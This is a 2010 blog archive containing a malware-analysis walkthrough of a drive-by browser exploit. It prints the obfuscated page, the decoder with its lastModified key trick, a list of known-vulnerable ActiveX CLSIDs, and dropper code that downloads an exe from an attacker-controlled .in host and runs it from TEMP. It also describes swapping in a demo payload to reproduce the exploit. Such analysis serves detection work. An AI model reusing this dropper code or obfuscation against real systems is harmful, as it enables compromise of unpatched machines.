Archive for February, 2010

Porting Narcissus to Rhino

Friday, February 26th, 2010

I just spent a couple days trying to build Spidermonkey on Windows with Narcissus, JS_THREADSAFE and JS_HAS_FILE_OBJECT support in order to parse and do some static analysis of  malicious JS.

After patching the the Makefiles (and cpp in one place) and trying way too hard to make it work, I’ve got to warn others off of going down this route. I repeat: DON’T try to make it work. First, you’ll find that there’s no easily available parsing API in spidermonkey itself and that building in extensions is incredibly tedious and error prone (despite the great autoconfig work done in 1.8.1 for the vanilla build, which works perfectly); second, the non-standard File object is no longer maintained and as of Feb 10, 2010 is completely removed.

So with that option DOA, if you had your heart set on using Narcissus for parsing, it can be trivially ported to Rhino. Despite Brendan’s comments in the Narc code and other locations on the web that it relies on several Spidermonkey-specific extensions, it runs perfectly fine (at least the parser does) with a few minor changes. Here is the code, a diff, and sample tree walker.

Malware Analysis Walking Tour (The Exploit)

Thursday, February 25th, 2010

If you’re just tuning in, this is the second post in a series. Check out the beginning of the Malware Analysis Walking Tour to see how we got here.

The Exploit

Everything up to this point has just been a wrapper around the actual exploit; boilerplate or necessary paperwork if you will. Now it’s time to look at what code actually got the machine to do something it wasn’t supposed to do, that is, what caused the SgwAg.exe to get written to disk and ultimately executed.
Again, I start with a topical readthrough to get an idea of what’s significant and the general flow (full decoded exploit routine in Appendix 2). I see that the exploit code consists of a series of function definitions followed by a single statement: a call to mudac().

1
2
3
4
5
6
function    Complete() { [...] }
function    mudac() { [...] }
function    Func4() { [...] }
function    FuncPD() { [...] }
function    FuncKJ() { [...] }
mudac();

The mudac() function is actually a slightly modified form of one we’ve seen many times before; probably copy and pasted code from some malware forum or a published exploit. The function simply tries to instantiate a list of known-vulnerable CLSIDs (ActiveX controls) and stops at the first one that gives it shell access. If all those fail, it falls through to the creatively named Func4, FuncPD, and FuncKJ to try some Acrobat and Java applet exploits.

79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
function mudac()
 {
     var mdacok = 0;
     var i = 0;
     var objects = new Array(
     '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
     '{BD96C556-65A3-11D0-983A-00C04FC29E36}',
     '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
     '{0006F033-0000-0000-C000-000000000046}'
     ,... [...many more of these...] );
     while (objects[i])
     {
         var a = null;
         if (objects[i].substring(0, 1) == '{')
     {
         a = document.createElement('object');
         a.setAttribute('classid', 'clsid:' + objects[i].substring(1, objects[i].length - 1));
     }
     else {
         try {
             a = new ActiveXObject(objects[i]);
         }
         catch (e) {}
     }

Given the relatively low level of sophistication here combined with the fact that the Malware Scanner VM that got owned is missing a lot of patches, I don’t expect that any of these will be new to us, but panning for gold is always a tedious process. Here Google is our friend. If I plug in a CLSID and it comes back with a lot of pages discussing an exploit then it’s probably nothing new. If all the pages we see are from MSDN or application programming forums, then this is more likely to be something that isn’t widely known as being exploited. The middle ground is that it’s a control that has been exploited before, but there’s some new vector; in practice this doesn’t happen too often. Take it away Google:

BD96C556-65A3-11D0-983A-00C04FC29E36	MS06-014		RDS.DataSpace
AB9BCEDD-EC7E-47E1-9322-D4A210617116	MS06-014	
0006F033-0000-0000-C000-000000000046	MS06-014		Outlook Data Object
6e32070a-766d-4ee6-879c-dc1fa91d2fc3		MS06-014		MUWebControl
6414512B-B978-451D-A0D8-FCFDF33E833C	?			WUWebControl
7F5B7F63-F06F-4331-8A26-339E03C0AE3D 	MS06-014, MS06-073, MS07-016
06723E09-F4C2-43c8-8358-09FCD1DB0766	MS06-014	
639F725F-1B2D-4831-A9FD-874847682010	MS06-014		DExplore.AppObj.8.0
BA018599-1DB3-44f9-83B4-461454C84BF8	MS06-014		VisualStudio.DTE.8.0
D0C07D56-7C69-43F1-B4A0-25F5A11FAB19	Metasploit		Microsoft.DbgClr.DTE.8.0
E8CCCDDF-CA28-496b-B050-6C07C962476B	Metasploit		VsaIDE.DTE

Most of these have all been well analyzed and reported on. The only one that didn’t have a clear story was 6414512B-B978-451D-A0D8-FCFDF33E833C. It’s worth revisiting once we’ve finished analyzing what happens after one of these is instantiated. We still don’t know which control actually owns the machine. The mudac function is a pretty standard example of the drive-by malware approach of “throw a bunch of crap at the browser and see if something works” (You can actually see that the same GUIDS appear multiple times in the objects array; clearly some copy-paste-kitchen-sink coding going on here). We’ll put this issue on the back burner for now; it’s enough to know that one of them worked.

At this point I read CreateO() and Go() to see what the code is doing after it finds an ActiveX control it can instantiate. The first thing I notice is that the name of the exe that gets created (SgwAg.exe) doesn’t show up anywhere. I suspect that the “filename” var in Go() might be randomly generated by the server. Lets see what happens if we get the page again.

1
2
3
4
5
6
7
8
9
10
11
12
13
$ wgetasie http://nevpizdy-nenyznie50domain.in
$
$ tail -n 5 index.html.1
function vo3vSHVwARAZTn ( dpykxo,AEvKPWK6 ) { var awsTEVuk = new String();var
HHHXupleSC = new String();
 var qIdJvCEMJ = dpykxo.split(';'); for(iKPD3 = 0;iKPD3 < qIdJvCEMJ.length-
1;iKPD3++)
 { awsTEVuk = String['f#ro!mC#ha@r^C&ode'.replace(/@|&|#|\^|\!|\(|\)/ig, '')]
(qIdJvCEMJ[iKPD3] - AEvKPWK6);
HHHXupleSC = HHHXupleSC + awsTEVuk;} return HHHXupleSC;}var vnfjqq =
Date();VXR9U = vo3vSHVwARAZTn(Z5E1xxR,NJXUlfyA);
var qIdJvCEMJ = 'awsTEVuk';function krasddk(zxc) {eval(zxc); return;};krasddk(
VXR9U );</script></body></html>

Ah! Lots of different variable names, same structure. Is the Modified Date at least constant?

1
2
3
$ stat index.html.1
 [...]
 Modify: 2009-12-28 19:23:41.000000000 -0800

Nope. So, it looks like there’s a real script on the other end that’s re-doing the obfuscation on each request. Cheeky bastards. No bother, we can confirm by going back to the original content that the Malware Scanner picked up and verifying that (when decoded) the filename that gets written is indeed the one supplied in Go().

Copying the page from the Scanner report into index.html.from_scanner and stripping any of the HTML/DOM cruft, then changing eval() to print() lets us run the code outside of a browser. The only other change we need to make is to short circuit the lastModified check. Since we know the first character in the resulting plaintext is “f”, it’s easy to work back to the decoding key (in this case it’s 118 – ‘f’ = 16).

1
2
$ js index.html.from_scanner | grep "var filename"
 var filename = 'SgwAg.exe';

Good, we’re back on solid ground. So, we know the nature of the obfuscation and the exploit, and have isolated the payload. Next up is payload analysis, but for a number of reasons we like to have samples of each exploit vector that we find in the wild.

So, I cook up a version of this exploit that downloads a demo payload; I like calc.exe. It’s a simple matter of finding the part of the obfuscated script element that corresponds to the evil payload url and replacing it with the url of something more benign. While I’m at it, I add an alert() to print which ActiveX control actually causes the payload to be downloaded and run (remember that it tries several) and also remove the couple of other Java and Acrobat exploits.

 
...155c167X167s163h109o98c98C161d152M169...
 = h     t     t    p     :     / / n       e   v
 http://pizdy-nenyznie50domain.in/feedback.php?page=1

 http://example.com/demo-payload                       (I used a real url of course)
 h    t     t    p     :     / / e       x   a
 ...155a167a167a163a109a98a98a152a171a148...

Copy it over to the test server, fire up an unpatched IE and…Bingo.

This would be enough to call it a day if we were only interested in the exploit vector; it’s a well known exploit vector and now we’ve got a nice sample in case we ever need to reproduce it. However, we could still take a look at the payload it brought down.

Next Time: The Payload

Malware Analysis Walking Tour

Tuesday, February 23rd, 2010

Part of my day job lately has been to build up a catalog of drive-by browser exploits and so I decided to put up some notes on the process. When I first started taking apart malware, the detailed examples I found online were invaluable, so I’m putting this up partly to try to give back and partly to try to make the whole process a little more accessible to the interested but not-quite-as-technical reader. Feel free to post a reply or contact me with questions or comments.

Getting Started

Sometimes finding a piece of malware to examine can be the first hurdle in doing any analysis. Here we have it pretty easy; we run a malware scanner that crawls the net with a swarm of unpatched virtual machines and monitors them to detect unusual behavior. When one of them exhibits symptoms of malware we can dump information about what happened to the machine, restore it from a snapshot, and send it back out to continue trawling.

Here we can see that the root page of nevpizdy-nenyznie50domain.in caused some suspect behavior on an unpatched XP/IE6 VM. Let’s take a look at what happened.

The static analysis came back clean. No real surprise there, since static analysis is a coarse-grained, best effort type approach; it picks up the obvious stuff, but it’s easy to fool. This exploit is going to be worth looking into, if for no other reason than it will help us refine our static analysis detections.

Runtime (aka dynamic) analysis is where we’re really going to see stuff happen. Here we see a new process being executed from some binary file that shouldn’t be there; whatever the exploit is, the words “arbitrary code execution” are going to show up in the description.

I don’t know where that file came from at this point; best guess is that it’s being downloaded from some remote site rather than written manufactured by logic on the page. We’ll see.

Time to get out of the GUI and get our hands dirty. Before I get to the code, a word of warning: don’t go visit these urls. They’ve demonstrably owned a machine already, so unless you really want to know if it happens every time you should probably keep your hands in your pockets on this one.

$ mkdir nevpizdy-nenyznie50domain.in
$ cd nevpizdy-nenyznie50domain.in/
$ touch notes
$ wgetasie http://nevpizdy-nenyznie50domain.in
$ chmod -w index.html
$ less index.html
<html><body><div style="display: none"><ul><li
id="khBsFxi">153n168Q161h150s167b156H162S161s83v118K162K160c163U159w152a167I152y91t92i61y174b61Q83Z83F83b83V166n152I167D135i156d160r152z162K168k167a91R90D159T162N150O148d167q156i162a161R97r155Z165K152Z153X83m112p83w85s148R149S162f168Z167W109O149C159N148O161N158y85p90e95B83I100s99P99m99i99y92M110z61q176l61K61P15
3J168w161F150G167p156X162Y161U83w122u162j91z148I92x61M174G61m83r83I83v83k169Y148h165T83W166u83T112N83g118d165c152p148a167i152w130P91F148U95k83C90P138U134C150Y165R156P163e167E97H134n155z152r159L159h90L92i110b61e83v83H83I83Y169x148j165G83t162y83M112O83j118O165d152D148Q167C152V130g91h148a95n83U90a116e119f130H119q1
[...]

Hmm, clearly some obfuscated exploit code, but doesn’t look like an encoding I’ve seen before. There’s a lot of that junk (full content in Appendix 1 of this pdf if you want to follow along), but what comes after is more immediately interesting (if horribly ugly):

 
<script>function zacabab (abeicd) { var terry = abeicd.split(':'); var merry = 'zxc'; return terry[2];};</script>
<script>
 var FhcL0z0 = new String(""); FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
g6VZ13w8 = document.lastModified; k0miOe5c = zacabab(g6VZ13w8); FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');
function aXzLA9jbkkRMIW ( OzNL6t,em7lqjVq ) { var AYMQGuD7 = new String();var bsL1aXtpUc = new String();
 var mXhEn59Xi = OzNL6t.split(';'); for(euWM8 = 0;euWM8 < mXhEn59Xi.length-1;euWM8++)
 { AYMQGuD7 = String['f#ro!mC#ha@r^C&ode'.replace(/@|&|#|\^|\!|\(|\)/ig, '')](mXhEn59Xi[euWM8] - em7lqjVq);
bsL1aXtpUc = bsL1aXtpUc + AYMQGuD7;} return bsL1aXtpUc;}var vnfjqq = Date();LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);
var mXhEn59Xi = 'AYMQGuD7';function krasddk(zxc) {eval(zxc); return;};krasddk( LCEsM );</script>

This is the decoding part of the script (or a pretty-printed version in Appendix 2 of the pdf). So, there are two ways to do this right now; one is carefully take this script apart and manually decode it piece by piece, the other way is to let it do its thing in a javascript debugger and just grab whatever it decodes from memory. The later is a lot faster.

Since this is a payload that targets Windows machines and I’m on a reduced privilege account on a linux machine, it’s reasonable to let this thing run. Just in case, I take a moment to switch Firefox to use Paros proxy so that if the script makes any requests I can record them and then drop them.

I open up Firebug on a blank page, set “Break on Next”, and then load the index.html that I pulled down with wget. When the page has finished rendering, I take a look at the DOM to see if anything jumps out at me; in this case, something does.

FhcL0z0 = "153;168;161;150;167;156;162;161;83;118;162;160;163;159;152;167;152;91;92;61;174;61;83;83;83;83;166;152;167;135;156;160;152;162;168;167;91;90;159;162;150;148;167;156;162;161;97;155;165;152;153;83;112;83;85;148;149;162;168;167;109;149;159;148;161;158;85;90;95;83;100;99;99;99;99;92;110;61;176;61;61;153;168;161[…]

So FhcL0z0 is now interesting. Where did it come from?

FhcL0z0 = document.getElementById("khBsFxi").innerHTML;
FhcL0z0 =  FhcL0z0.replace(/[^0-9]/g,';');

Remember the <li> that started out with “153n168Q161h150s167…”? It turns out that strange looking “encoding” scheme was just sticking random letters between the sets of numbers. This is a case that code reading could have turned up the info just as quickly as running the script: two methods, both will usually work.

The nice thing about running it is that there’s still lots of stuff in the DOM to look at. Back to Firebug:

LCEsM =function Complete()
{
    setTimeout('location.href = \"about:blank\"', 10000);
}
function Go(a)
{
    var s = CreateO(a, 'WScript.Shell');
    var o = CreateO(a, 'ADODB.Stream');
    var e = s.Environment('Process');
    var urltofile = 'http://nevpizdy-nenyznie50domain.in/feedback.php?page=1';
    var filename = 'hgivV.exe';
    var xhr = null;
    var bin = e.Item('TEMP') + '\\' + filename;
[...]

Hey, that’s nice. There’s only one layer of obfuscation going on here; once we get through the junk in FhcL0z0, it’s pretty readable (they even left the linebreaks in, how thoughtful). This is the code that actually performs the exploit; it gets executed via a gently-obfuscated eval() call at the end of the script tag: krasddk( LCEsM );
We don’t really need to know at this point, but it might be instructive to figure out where LCEsM came from.

LCEsM = aXzLA9jbkkRMIW(FhcL0z0,k0miOe5c);

Long story short, LCEsM is produced by decoding FhcL0z0 using a function and a key. The function is a simple for-loop that walks the input string and executes an obfuscated call to fromCharCode. The key is from

g6VZ13w8 = document.lastModified;
k0miOe5c = zacabab(g6VZ13w8);

The zacabab() function just splits the date at the “:” and returns the final string. Firebug tells me that the last modified date of the file is “12/28/2009 14:42:51” (and examining g6VZ13w8 and k0miOe5c confirms this); therefore the key needed to decode it is 51. A quick check verifies that we understand the encoding scheme.

$ python
>>> encoded = "153;168;161;150;167;156;162;161"
>>> "".join([chr(int(c) - 51) for c in encoded.split(";")])
'function'

As an aside, this is a perfect example of why DRM is ultimately a losing battle; if you provide someone with the ciphertext, the scrambling method, and the key, then you have provided them with everything they need to compromise your system. It works the same no matter if you’re a blackhat or a movie studio.

Back to the analysis, a quick bravo is called for for the folks behind wget. It correctly preserved the Last Modified date while saving the page to the filesystem; without that, there would be been a lot more trial and error to figuring out the key. Thanks Hrvoje Niksic and Micah Cowan!

$ stat index.html
[...]
Modify: 2009-12-28 14:42:51.000000000 -0800

It seems that the detour to figure out how LCEsM was encoded was time well spent. We learned about an interesting obfuscation scheme (using lastModified) and learned that wget easily mitigates it. We can add this sort of information to static detections to correlate different exploits encoded by the same toolkit and do trending on related malware.

Next Time: The Exploit